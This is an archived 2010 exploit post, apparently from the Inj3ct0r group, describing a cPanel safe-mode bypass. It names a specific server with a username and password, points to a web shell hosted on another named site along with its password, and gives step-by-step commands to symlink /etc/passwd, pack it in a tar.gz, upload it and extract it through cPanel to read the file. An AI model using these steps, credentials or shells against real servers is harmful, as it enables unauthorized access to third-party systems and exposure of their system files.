Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23159
HistoryFeb 04, 2010 - 12:00 a.m.

Cpanel Bypass Safe mode [ extract tar.gz by Cpanel ]

2010-02-0400:00:00
vulners.com
35

====================================================
Cpanel Bypass Safe mode [ extract tar.gz by Cpanel ]

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

==============================================================================
[?] Script: [ Cpanel ]
[?] Language: [ PHP ]
[?] Vendor [http://cpanel.com/]
########################################################################
information :

http://www.fanaan.net:2082

username : fanaan
password : admin

This server g00d security :)

safe mode = on

disable function

the shellz not open ; looooool

the cgi-telnet not runned in the server

no bypass


Exploit :

http://mobilyashop.com/cgi-bin/rotq8.txt

password : rotq8


go to any cgi-telnet or shellz in the other server [security=0]

add command : ln -s /etc/passwd t.xt

add command : tar -zcf red.tar.gz t.txt

now : download red.tar.gz in the your Pc; and uploaded red.tar.gz in the

g00d security server

now extract red.tar.gz by cpanel

now Created a new file ; the file name t.txt

now click to t.txt Choose [code edit]

looool I'm see /etc/passwd your g00d sEcurity server xD

~ - [ [ : Inj3ct0r : ] ]